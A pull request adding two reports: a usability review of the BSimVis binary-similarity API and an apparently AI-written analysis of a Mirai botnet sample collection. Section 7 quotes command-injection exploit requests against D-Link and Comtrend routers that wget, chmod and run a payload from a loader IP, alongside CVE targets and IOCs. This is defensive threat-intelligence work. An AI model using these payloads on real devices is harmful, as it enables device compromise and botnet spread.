### PR TITLE
docs: mirai7 collection analysis + API pivoting review

### DIFF
--- a/doc/reports/api_pivoting_review.md
+++ b/doc/reports/api_pivoting_review.md
@@ -1,0 +1,397 @@
+# BSimVis API — pivoting walkthrough, usability review and documentation gaps
+
+Companion to [`mirai7_family_report.md`](mirai7_family_report.md). Everything in
+that report was produced with the commands below, from a cold start (no prior
+knowledge of the collection). Server: `http://localhost:5001/api`.
+
+---
+
+## 1. How I discovered the API
+
+1. `doc/api_documentation.md` — endpoint list, params. This is good and was
+   enough to work without reading source.
+2. `ss -ltnp` to find the live port. **The docs and `AGENTS.md` say API default
+   is 5000; the running instance is on 5001.** First `curl` to `:5000` failed
+   silently (connection refused, empty body) with no hint.
+3. From then on, pure `curl` + `python3 -m json.tool`.
+
+---
+
+## 2. The pivot chain, with the actual commands
+
+### Step 0 — find the collection, size it up
+
+```bash
+curl -s "localhost:5001/api/collection/search?q=mirai&limit=20"
+curl -s "localhost:5001/api/index/status?collection=mirai7"
+# 174 files, 34503 functions, 99.25% indexed
+```
+
+### Step 1 — file inventory + threat-intel metadata
+
+```bash
+curl -s "localhost:5001/api/file/search?collection=mirai7&limit=200" -o files.json
+```
+
+One call returned everything needed for the corpus overview: `language_id`,
+`filetype`, `avtype`, `yara`, `cc_ip`, `first_seen`, `file_names`,
+`function_count`, `bsim_features_count`, `bin_clusters`. Aggregation was local
+(`collections.Counter`). **This is the single best endpoint in the API** — it
+collapses what would normally be five tools into one call.
+
+C2 pivot, straight from the same endpoint:
+
+```bash
+curl -s "localhost:5001/api/file/search?collection=mirai7&cc_ip=143.20.185.245&limit=20"
+# 7 files, 4 architectures, all hash-named
+```
+
+### Step 2 — binary clusters (which files belong together)
+
+```bash
+curl -s "localhost:5001/api/bin_cluster/list?collection=mirai7&limit=200&sort_by=count&sort_order=desc" -o bc.json
+```
+
+Trap (see §4.1): the response is a **dendrogram**. Root node = all 174 files at
+cohesion 0.043. Leaves have to be derived client-side:
+
+```python
+par = {str(c['parent']) for c in results}
+leaves = [c for c in results if str(c['cluster_id']) not in par]   # 50 of 100
+```
+
+### Step 3 — binary similarity pairs (how strongly, and across what)
+
+```bash
+# naive: useless — top 300 pairs are all 2-function UPX stubs at score 1.0
+curl -s "localhost:5001/api/bin_sim/search?collection=mirai7&limit=300&sort_by=score&sort_order=desc"
+
+# useful:
+curl -s "localhost:5001/api/bin_sim/search?collection=mirai7&limit=500&min_funcs=50&min_score=0.5&sort_by=score&sort_order=desc"
+# 15051 pairs -> 89
+```
+
+Then quantify one pair:
+
+```bash
+curl -s "localhost:5001/api/bin_sim/diff?collection=mirai7&md5_a=168036e68ea46fd5dd2be5f70e248d9d&md5_b=282898fac2e6a88c4108e9751cfc8ce4&view=sankey"
+# {"score":0.973, "counts":{"matched":583,"unique_to_a":8,"unique_to_b":13}}
+```
+
+`view=sankey` is the right call here — the full diff document for a 590-function
+binary is huge, the projection answers "how much is shared" in one line.
+
+### Step 4 — function clusters (what code is reused)
+
+Naive sort by count is again useless: the biggest clusters are dendrogram
+internals (`entry`, n=30172, cohesion 0.003) and statically-linked uClibc
+(`__stdio_wcommit`, `_ppfs_setargs`, `malloc`, `memchr`). Filtering helps:
+
+```bash
+curl -s "localhost:5001/api/cluster/list?collection=mirai7&limit=40&sort_by=count&sort_order=desc&min_cohesion=0.9&min_features=60"
+```
+
+…but the real breakthrough was going the other way — **from a name, not from a
+cluster**:
+
+```bash
+curl -s "localhost:5001/api/function/search?collection=mirai7&function_name=table_init&limit=10&min_cohesion=0.9"
+```
+
+`function/search` returns a `clusters` map alongside the matched functions.
+Because a handful of samples in this collection kept their symbols, one query
+turns a known Mirai symbol into a cluster UUID, and the cluster UUID turns into
+every stripped `FUN_xxxxxxxx` twin:
+
+```bash
+curl -s "localhost:5001/api/function/search?collection=mirai7&cluster_uuid=8ec63aa85bd9&limit=200"
+# 40 members, 34 files, 8 architectures — all with full metadata (arch, file, features)
+```
+
+This "symbolised sample as Rosetta stone" workflow is the strongest thing the API
+supports, and it is **not described anywhere in the docs**.
+
+### Step 5 — down to source
+
+```bash
+curl -s "localhost:5001/api/function/code?id=idx:mirai7:func:0fac505e1c34ad2c2f108c8fa586d8a3:0001c164"   # ARM  table_init
+curl -s "localhost:5001/api/function/code?id=idx:mirai7:func:069a963215886b09b570c345e46ba20a:00407780"   # x86-64 FUN_00407780
+```
+
+Rows → tokens → join `token['text']`. Side-by-side is also available via
+`/api/diff?...&addr_a=..&addr_b=..`.
+
+Grepping the joined token text for IPs/URLs is what surfaced the loader
+`37.48.254.120` in the `mipsel` exploit scanners — there is no string-search
+endpoint, so this has to be done client-side, function by function.
+
+### Step 6 — annotate the results back into the collection
+
+```bash
+# whole cluster at once — every stripped twin inherits the label
+curl -s -X POST localhost:5001/api/tags/bulk_add -H 'Content-Type: application/json' \
+  -d '{"collection":"mirai7","entity_type":"function",
+       "entity_ids":["mirai7:func:<md5>:<addr>", "..."],"tag":"mirai:config_table"}'
+
+curl -s -X POST localhost:5001/api/tags/add -H 'Content-Type: application/json' \
+  -d '{"collection":"mirai7","entity_type":"file","entity_id":"mirai7:file:<md5>","tag":"campaign:frosted"}'
+
+curl -s -X POST localhost:5001/api/notes/file/add -H 'Content-Type: application/json' \
+  -d '{"collection":"mirai7","file_id":"mirai7:file:<md5>","owner":"claude-report","text":"..."}'
+```
+
+`entity_id` is the `file_id` / `function_id` straight out of the search
+endpoints — this composes perfectly with step 4 (search a cluster, pipe the
+`function_id` list into `bulk_add`). 15 tag operations covered 88 functions and
+124 file-tag assignments. This is the API at its best.
+
+### Step 7 — LLM triage
+
+```bash
+curl -s -X POST localhost:5001/api/llm/summarize -H 'Content-Type: application/json' \
+  -d '{"func_id":"mirai7:func:069a963215886b09b570c345e46ba20a:00407780","func_name":"FUN_00407780"}'
+```
+
+Returns **plain text** (SUMMARY / KEYWORDS / IMPACT / LOGIC sections), not JSON.
+Genuinely useful: run on the stripped x86-64 `FUN_00407780` it described Mirai's
+`table_init` semantics correctly without any symbol, independently confirming the
+cluster match. It also surfaced the `37.48.254.120` loader — which I verified in
+the raw decompiled strings before putting it in the report.
+
+---
+
+## 3. How good is the API for pivoting?
+
+**Very good.** Score by axis:
+
+| Axis | Verdict |
+|---|---|
+| Corpus triage (file → metadata) | Excellent. One call, all threat-intel fields, all filterable. |
+| Infrastructure pivot (C2, YARA, AV, filename) | Excellent — `cc_ip`, `yara`, `avtype` are first-class filters at file *and* function level. |
+| File→file similarity | Good, once `min_funcs` is applied. `bin_sim/diff?view=sankey` is exactly the right granularity for a report. |
+| Cluster → member drill-down | Awkward. Two endpoints (`cluster/members`, `cluster/functions`) both underperform `function/search?cluster_uuid=`. |
+| Name → cluster → stripped twins | Excellent, and the highest-value path. Undocumented. |
+| Cluster → code | Excellent, but the ID format has to be reconstructed by hand (§4.4). |
+| Cross-architecture reasoning | Works at function level (8 ISAs in one cluster), fails at binary level (MIPS BE↔LE only). Nothing in the docs sets that expectation. |
+| Annotation write-back | Excellent. `tags/bulk_add` eats `function_id` lists from search verbatim; cluster-wide labelling is one call. |
+| LLM assistance | Useful for stripped code, but see §4.11 (config points at an uninstalled model, response is plain text, no `model` override). |
+| String / IOC search | **Missing.** No endpoint searches decompiled text or embedded strings; IOC extraction is a client-side loop over `function/code`. |
+
+Round-trip cost: the analysis was ~30 read calls plus ~20 annotation writes. No pagination pain, no
+rate limits, filters compose cleanly. The gap is not capability — it's that a
+newcomer will burn their first hour on the four traps below.
+
+---
+
+## 4. Documentation gaps (in priority order)
+
+### 4.1 Cluster lists return a dendrogram, not a partition — **not documented**
+
+`cluster/list` and `bin_cluster/list` return HDBSCAN condensed-tree nodes,
+parent-linked. For `mirai7`: `bin_cluster/list` root node `174` has `count: 174`
+(the whole collection) at cohesion 0.043; `cluster/list` root has `count: 30172`.
+Sorting by `count` desc — the obvious first move — returns meaningless nodes.
+
+Docs only say *"Cluster membership excludes points shed as noise by HDBSCAN"*.
+They should say:
+
+* the list contains internal nodes **and** leaves, linked by `parent`;
+* `cohesion_score` rises as you descend;
+* the leaf-derivation snippet from §2 above;
+* that `file['bin_clusters']` is the file's **path through the tree**, not a set
+  of distinct memberships (a file listing 17 `bin_clusters` is in one branch).
+
+### 4.2 `parent` is a **string** while `cluster_id` is an **int**
+
+```json
+{"cluster_id": 175, "parent": "174"}
+```
+
+Any `id in {parents}` comparison silently returns "everything is a leaf". Either
+document it or normalise the type.
+
+### 4.3 `cluster/functions` and `cluster/members` are effectively broken/misleading
+
+* `cluster/functions?cluster_uuid=<uuid>` returns members **without** the
+  `file_name`, `file_md5` and `language_id` keys at all (keys present:
+  `function_id`, `function_name`, `entrypoint_address`, `namespace`,
+  `return_type`, `parameters`, `bsim_features_count`) — the file/arch fields you
+  actually pivot on are missing. `file_md5` is recoverable only by parsing
+  `function_id`.
+* Passing a **`cluster_id`** to `cluster_uuid` returns `{"functions": [], "total": 0}`
+  — an empty success, not a 400. Easy silent dead end.
+* `cluster/list?...&show_members=true` returns `sample_members` **with** full
+  metadata — inconsistent with `cluster/functions`.
+
+Docs should state plainly: **use `function/search?cluster_uuid=` for cluster
+drill-down**; `cluster/functions` is a lightweight sample only.
+
+### 4.4 Function ID format is documented, but its construction isn't
+
+The doc says `function/code` wants `idx:coll:func:md5:addr`. Search endpoints
+return `function_id: "mirai7:func:<md5>:<addr>"` — the same string **without**
+the `idx:` prefix. Both forms work in practice (verified: identical 164-row
+response), but the docs show only the prefixed form, so a reader assumes a
+transformation is required. Say that `function_id` is directly usable. Also
+`full_id` exists on function documents in a third, unrelated format
+(`<md5>:#<md5>::<name>:@<addr>`) with no explanation of which endpoint eats it.
+
+### 4.5 Response envelopes are undocumented across the board
+
+The doc lists params and describes returns in prose, but never gives the
+top-level keys. Observed, and inconsistent:
+
+| Endpoint | Items key |
+|---|---|
+| `file/search` | `files` (+ undocumented `bin_cluster_map`, `total_files_in_collection`) |
+| `function/search` | `functions` (+ undocumented `clusters` map, `pool_truncated`) |
+| `cluster/list`, `bin_cluster/list`, `bin_sim/search` | `results` |
+| `cluster/functions` | `functions` |
+| `collection/search` | `collections` |
+
+The `clusters` map on `function/search` is the key to the whole
+name→cluster→twins workflow and it isn't mentioned at all.
+
+### 4.6 Packed/tiny binaries dominate similarity — no guidance
+
+15 051 bin_sim pairs; the top 300 by score are all 2-function UPX stubs at
+score 1.0. `min_funcs` exists and fixes it, but the doc doesn't say the default
+ranking is dominated by degenerate binaries, nor whether `min_funcs` applies to
+one side or both. `doc/similarity_filtering.md` would be the right home for a
+"filter degenerate binaries" section.
+
+### 4.7 `min_cohesion` default of 0.95 on `function/search` is a silent filter
+
+Documented (*"clusters below the threshold are dropped"*) but the effect is
+invisible: you get functions back with an empty/partial `clusters` map and no
+indication that clusters were dropped. A `clusters_filtered: N` counter would
+save a lot of confusion. `cluster/list` has **no** default — the asymmetry
+between the two endpoints should be called out.
+
+### 4.8 `file_name` matching is fuzzy, with no exact-match option
+
+`file/search?file_name=net` matched a different file than the sample literally
+named `net`, producing a nonsense diff (0 matched, 591 unique) before I noticed.
+The doc explains that `file_name` also matches parent/related names, but not that
+matching is substring-based. There is no `exact=true`. Workaround: always resolve
+to `file_md5` first.
+
+### 4.9 Cross-architecture behaviour is undocumented
+
+Empirically: function-level clusters cross ISAs freely (one cluster spans ARM,
+MIPS BE/LE, x86 32/64, SuperH4, PowerPC, SPARC), while binary-level similarity
+only crosses **endianness within the same ISA**. That is a fundamental property
+of how the scores are built and every analyst will hit it. One paragraph in
+`doc/similarity_filtering.md` would prevent wrong conclusions ("these samples are
+unrelated" when they share 34-file function clusters).
+
+### 4.11 LLM endpoints: undocumented failure mode and response type
+
+* `bsimvis_config.toml` shipped pointing at `qwen3.6:35b`, which was not present
+  in the local Ollama (`qwen3.5:4b`, `qwen3.5:9b`, `qwen3.6:latest` were). The
+  API surfaced it as a bare `Error: model 'qwen3.6:35b' not found (status code:
+  404)` with **HTTP 200**. Neither the docs nor `AGENTS.md` mention that the
+  model name must match a pulled Ollama model, or where to change it.
+* `/api/llm/summarize` returns **plain text**, not JSON — the doc says
+  "Generates a summary" with no response type. `json.load()` on it fails with a
+  confusing `Expecting value: line 1 column 1`.
+* No `model` parameter in the request body — you cannot pick a smaller/faster
+  model per call, so a wrong config value blocks all LLM use.
+* Cost is not signalled: a single `summarize` on a 160-line function took
+  ~2 minutes on a 9B local model. Worth a note that these calls are slow enough
+  to need a long client timeout.
+
+### 4.12 No string / IOC search
+
+The highest-value IOC in this collection (the loader `37.48.254.120`, embedded
+in five exploit scanner functions) is only reachable by fetching
+`function/code` per function and regexing the joined token text. `features/*`
+indexes BSim features, not literals. A documented "search decompiled text /
+string literals" filter on `function/search` would remove a whole class of
+client-side loops.
+
+### 4.13 Smaller items
+
+* `index/status` returns `num_sim_meta: 500000` — a suspiciously round number
+  (cap? truncation?). Undocumented either way.
+* `bin_cluster/list` returns `yara_distribution`, `avtype_distribution`,
+  `filetype_distribution`, `ccip_distribution` — all empty here, and not
+  mentioned in the docs. If they are populated only under some condition
+  (a rebuild flag?), say which.
+* `cluster_name` is derived from a majority member name, so clusters get named
+  after uClibc functions (`__xstat64_conv`) or after one fork's private symbol
+  (`xor_init` vs `table_init`). Worth one line: **cluster names are hints, not
+  labels**.
+* No documented way to list all distinct values of a metadata field
+  (arch, yara, avtype) — every consumer re-implements the counting client-side.
+
+---
+
+## 5. Suggested additions to `AGENTS.md`
+
+`AGENTS.md` documents the internals well (jobs, pools, Lua/Kvrocks constraints)
+but says nothing about *consuming* the API, which is what every analyst-facing
+agent task needs. Proposed sections:
+
+```markdown
+## Talking to the API
+
+- Check the live port before assuming the default: `ss -ltnp | grep python`.
+  `.env` (`APP_PORT`) overrides the 5000 default — the dev box runs 5001.
+- Swagger UI: `/api/`. Endpoint reference: `doc/api_documentation.md`.
+- Response envelopes differ per endpoint: `files` / `functions` / `results` /
+  `collections`. Never assume `items`.
+
+## Cluster model (read before any cluster query)
+
+`cluster/list` and `bin_cluster/list` return an HDBSCAN **condensed tree**, not a
+flat partition. The largest-`count` node is the root and is meaningless.
+`parent` is a string, `cluster_id` an int. Derive leaves client-side, or descend
+until `cohesion_score` is high enough for your purpose.
+Drill down with `function/search?cluster_uuid=` (full metadata), not
+`cluster/functions` (sample only, null `file_name`).
+
+## Analyst pivot recipe (corpus -> reused code)
+
+1. `file/search?collection=X&limit=200`            — inventory + threat-intel
+2. `bin_cluster/list` -> leaves                    — which files group together
+3. `bin_sim/search?min_funcs=50&min_score=0.5`     — how close, cross-arch or not
+4. `bin_sim/diff?...&view=sankey`                  — matched/unique counts for a pair
+5. `function/search?function_name=<known symbol>`  — read `clusters` from response
+6. `function/search?cluster_uuid=<uuid>`           — stripped twins in other samples
+7. `function/code?id=<function_id>`                — the code itself
+   (`function_id` from search is usable as-is; the `idx:` prefix is optional)
+8. `tags/bulk_add` + `notes/file/add`              — write findings back;
+   tagging cluster members propagates a name to every stripped twin
+9. `llm/summarize` (plain-text response, slow)     — triage stripped functions;
+   treat output as a lead and verify against `function/code`
+
+## LLM config
+
+`bsimvis_config.toml` `[llm].model` must name a model actually pulled in Ollama
+(`curl localhost:11434/api/tags`). A mismatch returns HTTP 200 with a plain-text
+`Error: model '<x>' not found` body. There is no per-request model override.
+
+## Known analysis traps
+
+- Packed samples (UPX) decompile to ~2 functions and score 1.0 against each
+  other. Always set `min_funcs` on `bin_sim/search`.
+- `min_cohesion` defaults to 0.95 on `function/search`, 0 on `cluster/list`.
+- `file_name` filters are substring matches over own/parent/related names —
+  resolve to `file_md5` before diffing.
+- Function clusters cross architectures; binary similarity effectively does not
+  (only BE<->LE within one ISA).
+- `cluster_name` is a majority-vote hint, often a libc name. Don't trust it.
+```
+
+---
+
+## 6. Bottom line
+
+The API is genuinely good for the corpus → cluster → binary pair → function
+cluster → source pivot; I went from "never seen this collection" to identifying
+a cross-architecture shared config-table routine and an operator branding string
+in about twenty calls. The blockers are documentation, not capability: the
+dendrogram shape of cluster lists (§4.1), the `function/search?cluster_uuid=`
+drill-down path (§4.3/4.5), and the packed-binary ranking trap (§4.6) are the
+three that cost the most time and would each be fixed by a paragraph.

--- a/doc/reports/mirai7_family_report.md
+++ b/doc/reports/mirai7_family_report.md
@@ -1,0 +1,316 @@
+# Mirai7 collection — malware family report
+
+Analysis performed entirely through the BSimVis REST API (`localhost:5001/api`),
+collection `mirai7`, algo `unweighted_cosine`. Date of analysis: 2026-07-28.
+
+## 1. Collection at a glance
+
+| Metric | Value |
+|---|---|
+| Files | 174 (1 ingestion batch) |
+| Functions | 34 503 (34 245 indexed, 99.25 %) |
+| BSim features | 172 039 |
+| First / last seen (sample metadata) | 2025-04-04 → 2026-05-19 |
+| Named samples vs. hash-named | 131 / 43 |
+
+Architecture spread (14 Ghidra language IDs) — this is a classic IoT botnet
+cross-compilation matrix:
+
+| Arch | Files | | Arch | Files |
+|---|---|---|---|---|
+| ARM:LE:32:v8 | 42 | | 68000:BE:32 (Coldfire) | 11 |
+| MIPS:LE:32 | 31 | | PowerPC:BE:32:e500 | 11 |
+| MIPS:BE:32 | 19 | | sparc:BE:32 | 8 |
+| x86:LE:32 | 19 | | AARCH64 | 3 |
+| SuperH4:LE:32 | 12 | | Loongarch64 / RISCV32 / RISCV64 / MIPS64 | 2/2/2/1 |
+| x86:LE:64 | 11 | | | |
+
+AV labels confirm the family: `Unix.Dropper.Mirai-*`, `Unix.Trojan.Mirai-*`,
+`Unix.Malware.Mirai-*`, plus 15 samples labelled `Unix.Trojan.Tsunami-*` (Kaiten/
+Tsunami lineage, frequently bundled in the same distribution servers). YARA hits:
+`Backdoor_Linux_Mirai_*` / `Trojan_Linux_Mirai_*` variants — and `UPX_Protector`
+on **55 samples**.
+
+## 2. Packing: half the collection is a stub
+
+54 files expose fewer than 10 functions; 53 of those carry the `UPX_Protector`
+YARA hit. Those samples decompile to a 2-function UPX stub, so they are
+**analytically empty** for BSim and they poison naive similarity ranking: every
+stub-vs-stub pair scores `1.0` with `shared_clusters = 2`.
+
+Practical consequence for any report built on this collection: filter binary
+similarity with `min_funcs` (I used `min_funcs=50`). Without it, the top 300
+pairs by score are all packed stubs.
+
+Naming convention observed: samples prefixed `p` (`pmips`, `pmpsl`, `parm5`,
+`px86_64`, `pm68k`) and the `xnxnxnxnxnxnxnxn<arch>xnxn` set are the packed
+variants; the same campaigns also appear unpacked.
+
+## 3. Campaigns inside the collection
+
+Grouping file names by stem (after stripping the arch suffix):
+
+| Campaign stem | Files | Notes |
+|---|---|---|
+| `boatnet.*` | 33 | largest single build set, 10+ arch targets |
+| `p*` / `xnxn*` | 26 | packed builds (UPX) |
+| `DEMONS.*` | 14 | own build, own C2 resolver |
+| `nuclear.*` | 7 | **symbolised** — retains original Mirai symbol names |
+| `iran.mips*`, `mips`, `mipsel`, `cock`, `net`, `dicknet`, `unet`, `swatnet`, `chrome`, `nova.mipsel`, `manji.mpsl`, `tuxnokill.mpsl`, `wife.mpsl`, `m-p.s-l.dick` | 1–3 each | long tail of rebranded forks |
+
+Two C2 addresses are recorded in the file metadata, and each one ties together a
+full cross-architecture build set — the strongest infrastructure pivot available:
+
+* `143.20.185.245` — 7 files: x86-64, x86-32 (×2), MIPS:BE, ARM (×3)
+* `202.155.10.112` — 6 files: SuperH4, x86-64, SPARC, ARM (×2), PowerPC
+
+Both sets are hash-named (no original filename), so *without* code similarity
+they look like 13 unrelated unknowns.
+
+## 4. Binary clustering — how the family splits
+
+`bin_cluster/list` returns an HDBSCAN **dendrogram**, not a flat partition: 100
+nodes, root node `174` covering all 174 files at cohesion 0.043. The interesting
+level is the leaves — 50 of them covering 145 files.
+
+Selected leaf clusters (cohesion = mean pairwise binary similarity inside the
+cluster):
+
+| Cluster | n | Cohesion | Content |
+|---|---|---|---|
+| 208 | 14 | **1.000** | `boatnet.arm / arm5 / arm6 / arm7` + hash-named twins — one build, one day |
+| 206 | 5 | 0.963 | `pmpsl`, `wife.mpsl`, `boatnet.mips`, `pmips` — packed MIPS set |
+| 207 | 4 | 1.000 | `boatnet.mpsl` ×3 + hash-named |
+| 181 | 4 | 1.000 | `boatnet.ppc` ×4 |
+| 246 | 2 | 0.986 | `DEMONS.mpsl` ×2 |
+| 273 | 2 | 0.973 | `cock` / `net` — same source, MIPS BE vs MIPS LE |
+| 275 | 2 | 1.000 | `iran.mipsel` + hash-named twin |
+
+Key observation: the clusters are organised **by build/campaign, not by
+architecture**. Cluster 208 mixes ARM variants of the same campaign, and named
+samples repeatedly cluster with hash-named unknowns — which is exactly how you
+attribute an unknown sample here.
+
+## 5. Binary similarity — cross-endian, but not cross-ISA
+
+Filtering `bin_sim/search` to `min_funcs=50, min_score=0.5` leaves 89 pairs.
+Highlights:
+
+| Score | A | B | Arch A / B | Shared clusters |
+|---|---|---|---|---|
+| 0.973 | `cock` | `net` | MIPS:BE / MIPS:LE | 583 |
+| 0.953 | `32817e09…` | `4854ea67…` | MIPS:BE / MIPS:LE | 509 |
+| 0.952 | `pmips` | `pmpsl` | MIPS:BE / MIPS:LE | 220 |
+| 0.944 | `iran.mipsel` | `iran.mips` | MIPS:LE / MIPS:BE | 507 |
+| 0.991 | `32817e09…` | `iran.mips` | MIPS:BE / MIPS:BE | 518 |
+
+32 of the 89 pairs are cross-architecture — but **all** of them are MIPS BE ↔
+MIPS LE. No ARM↔MIPS or x86↔ARM pair survives at the binary level, because BSim
+features are lifted from p-code but whole-binary coverage still diverges too much
+across ISAs (different libc code paths, different inlining).
+
+The `cock` / `net` diff (`bin_sim/diff`) quantifies it: 583 matched clusters,
+8 unique to A, 13 unique to B, score 0.973. That is the same source tree compiled
+for two endiannesses, with a handful of functions added on one side.
+
+## 6. Function-level code reuse — the real signal
+
+This is where the cross-ISA link that binary similarity misses shows up.
+
+The collection contains a few **symbolised** samples (`nuclear.*`, `mipsel`,
+`cock`, `net`, `dicknet`, `arm7`, `nova.mipsel`) that kept the original Mirai
+symbol names: `attack_parse`, `attack_tcp_syn`, `attack_gre_ip`, `scanner_init`,
+`killer_init`, `table_init`, `table_lock_val`, `resolve_cnc_addr`, `rand_init`,
+`util_local_addr`, `anti_gdb_entry`. They act as a **Rosetta stone**: pivot from a
+named function to its similarity cluster, and every `FUN_xxxxxxxx` member of that
+cluster in a stripped sample inherits the meaning.
+
+### 6.1 `table_init` — the config-table decryptor, across 8 architectures
+
+The cluster containing `nuclear.arm7:table_init` (uuid `8ec63aa85bd9`, 40 members
+in 34 distinct files, cohesion 0.991, avg 95 BSim features) spans:
+
+```
+ARM:LE:32 13 | MIPS:LE:32 9 | x86:LE:32 5 | x86:LE:64 4
+MIPS:BE:32 3 | SuperH4 3   | PowerPC 2   | sparc 1
+```
+
+Tighter sub-nodes of the same branch: uuid `b1da238cc2c6` (37/31 files, 0.995),
+`b677fe34552c` (27/22, 0.999), `f28e6d43b032` (25/21, **1.000**).
+
+A separate, smaller cluster (`7faa9a55a27b`, 12 members, 12 files, 0.994) mixes
+`table_init` with a function named `xor_init` in another sample — the same
+routine renamed by a different fork's author.
+
+Concrete evidence from `function/code`, both members of cluster `f28e6d43b032`:
+
+`nuclear.arm7` (ARM:LE:32, symbolised):
+```c
+void table_init(void)
+{
+    void *pvVar1;
+    pvVar1 = malloc(6);
+    util_memcpy(pvVar1,&DAT_0002fadc,6);
+    table._4_2_ = 6;
+    table._0_4_ = pvVar1;
+    pvVar1 = malloc(7);
+    util_memcpy(pvVar1,&DAT_0002faec,7);
+    ...
+```
+
+`chrome` (x86:LE:64, stripped) — matched purely on BSim features:
+```c
+void FUN_00407780(void)
+{
+    undefined8 uVar1;
+    uVar1 = FUN_0040aec0(0x13);
+    FUN_004080d0(uVar1,"FROSTED IS HERE NIGGA",0x13);
+    _DAT_00512678 = 0x13;
+    _DAT_00512670 = uVar1;
+    uVar1 = FUN_0040aec0(0x36);
+    FUN_004080d0(uVar1,&DAT_0040e730,0x36);
+    ...
+```
+
+Same shape (`malloc` → `memcpy` → store ptr/len into a fixed table, repeated),
+different ISA, different bitness, no symbols on the x86-64 side. `FUN_0040aec0`
+= `malloc`, `FUN_004080d0` = `util_memcpy`. The x86-64 sample also leaks its
+operator branding in cleartext inside the config table: **`FROSTED IS HERE NIGGA`**
+— i.e. the `chrome` sample belongs to a "Frosted" rebrand, which no filename or
+AV label in the collection told us.
+
+### 6.2 Attack module
+
+`attack_tcp_syn` in `nuclear.arm7` sits in a family of large clusters (357–366
+avg features) whose named members are:
+
+`attack_gre_eth`, `attack_gre_ip`, `attack_tcp_ack`, `attack_tcp_legit`,
+`attack_tcp_null`, `attack_tcp_sack2`, `attack_tcp_stream`, `attack_tcp_syn`,
+`attack_tcp_synr`, `attack_udp_ovhhex`.
+
+They cluster *with each other* (25, 17, 9, 8 members over 3–4 files) because the
+Mirai attack handlers are near-identical boilerplate around one packet builder —
+useful to know: a cluster here identifies "an attack handler", not a specific
+attack. The `attack_udp_ovhhex` member indicates an OVH-targeted UDP flood, and
+`attack_gre_*` the GRE floods of the original Mirai leak. All these clusters are
+ARM-only — the attack code diverges more per-ISA than `table_init` does.
+
+`attack_parse` (163 features) gives a cleaner pivot: cluster `832a548e5b98`,
+5 members over 4 files (`nuclear.arm7`, `arm7`, `DEMONS.arm6`,
+`3d1cc5c4c42e43ace192728a05654943`), cohesion 0.998 — two of them stripped
+(`FUN_000082e8`, `FUN_0000828c`). So `DEMONS` and the hash-named unknown share
+the `nuclear` attack-command parser verbatim.
+
+### 6.3 Killer / anti-analysis / scanner
+
+* `killer_init` — cluster `92c30e6ad61b` (3 files: `arm7`, `ppc`, `sh4`,
+  cohesion 0.969, 205 features) and `1c4d8bfd1b65` (4 files across ARM + m68k).
+  The killer module (kills competing bots and telnet/ssh daemons) is shared
+  across the `nuclear.*` build set.
+* `competitiveKiller` — a *renamed* killer in `cock` / `net` / `dicknet`
+  (cluster `8a72dcda0ec1`, cohesion 1.000, MIPS BE + MIPS LE). Same job,
+  author-specific name → evidence of a distinct fork maintaining its own source.
+* `anti_gdb_entry` — cluster `aa8b0376c1e8`, 7 files, cohesion 1.000, spanning
+  ARM + MIPS LE + MIPS BE, present in `nuclear.arm7`, `dicknet`,
+  `tuxnokill.mpsl` and 3 hash-named samples. Note one member is named
+  `rpc_thread_multi` in another sample — a decoy symbol name.
+* `scanner_init` — the `mipsel` sample carries an **extended** scanner:
+  `dlinkscanner_scanner_init`, `comtrend_scanner`, `huawei_scanner_init`,
+  `realtek_scanner_init`, `adb_scanner_init` (310–401 features, cohesion
+  0.93–1.00). Exploit-based (not telnet-brute-force) propagation — see §7.
+
+## 7. The `mipsel` fork: exploit propagation and a loader IP
+
+Reading the decompiled scanner strings (`function/code`) turned up the payload
+URLs embedded in each exploit, all pointing at **one loader host not present in
+any sample's `cc_ip` metadata**:
+
+| Module | Request | Target |
+|---|---|---|
+| `dlinkscanner_scanner_init` | `GET /login.cgi?cli=aa aa';wget http://37.48.254.120/arm7 -O /tmp/arm7;chmod 777 /tmp/arm7;/tmp/arm7'$` | D-Link command injection |
+| `comtrend_scanner` | `GET /ping.cgi?pingIpAddress=google.fr;wget http://37.48.254.120/arm7 …&sessionKey=1039` | Comtrend ADSL `ping.cgi` injection |
+| `huawei_scanner_init` | `POST /ctrlt/DeviceUpgrade_1` (Digest auth) | Huawei HG532, CVE-2017-17215 |
+| `realtek_scanner_init` | `POST /picsdesc.xml`, SOAPAction `urn:schemas-upnp-org:…` | Realtek SDK UPnP SOAP, CVE-2014-8361 |
+| `adb_scanner_init` | — | Android Debug Bridge (5555/tcp) |
+
+**IOCs**: loader `http://37.48.254.120/<arch>`, dropped to `/tmp/<arch>` with
+`chmod 777`; HTTP `User-Agent: r00ts3c`.
+
+This fork is a real capability upgrade over stock Mirai (which brute-forces
+telnet only), and it is the only sample set in the collection carrying it.
+
+## 8. LLM-assisted triage (`/api/llm/summarize`)
+
+Per-function summaries were generated through the API and written back as notes
+(owner `claude-report`). Value: the summaries independently reproduced the
+semantics that the clustering had *implied*, without seeing the symbol names.
+
+* `chrome:FUN_00407780` (stripped x86-64) — *"sequentially allocates memory
+  blocks of varying sizes and copies static string literals into them, storing
+  the resulting pointers and lengths in global variables"*. That is exactly
+  Mirai's `table_init`, described from a stripped binary. Independent
+  confirmation of the cluster match in §6.1.
+* `cock:competitiveKiller` — *"persistent background process that monitors
+  active TCP connections … terminates the associated processes via SIGKILL"*,
+  parsing `/proc/net/tcp`. Confirms it as the competing-bot killer.
+* `nuclear.arm7:killer_init` — forks a watchdog that kills the parent and
+  `lock_commands()`; anti-analysis + persistence.
+* `nuclear.arm7:attack_parse` — deserialises the C2 attack payload and calls
+  `attack_start`.
+* `mipsel:comtrend_scanner` — flagged the loader IP `37.48.254.120` and the
+  `wget` + `chmod 777` chain, which I then **verified in the raw decompiled
+  strings** before using it (see §7). Worth stating explicitly: the LLM output
+  was treated as a lead, not as evidence.
+
+## 9. Annotations written back to the collection
+
+All via the API, so they are visible in the UI and reusable by the next analyst.
+
+Function tags (`tags/bulk_add`, applied to whole clusters):
+
+| Tag | Cluster uuid | Functions |
+|---|---|---|
+| `mirai:config_table` | `8ec63aa85bd9` | 40 (34 files, 8 architectures) |
+| `mirai:attack_handler` | `9981d8faef4d` | 25 |
+| `mirai:anti_gdb` | `aa8b0376c1e8` | 7 |
+| `mirai:attack_parse` | `832a548e5b98` | 5 |
+| `mirai:killer` | `92c30e6ad61b` | 3 |
+| `mirai:killer_competitive` | `8a72dcda0ec1` | 2 |
+| `mirai:scanner_exploit` | `ec3821a244d0`, `89f59cdca8ba` | 4 |
+
+File tags: `c2:143.20.185.245` (7), `c2:202.155.10.112` (6), `packed:upx` (55),
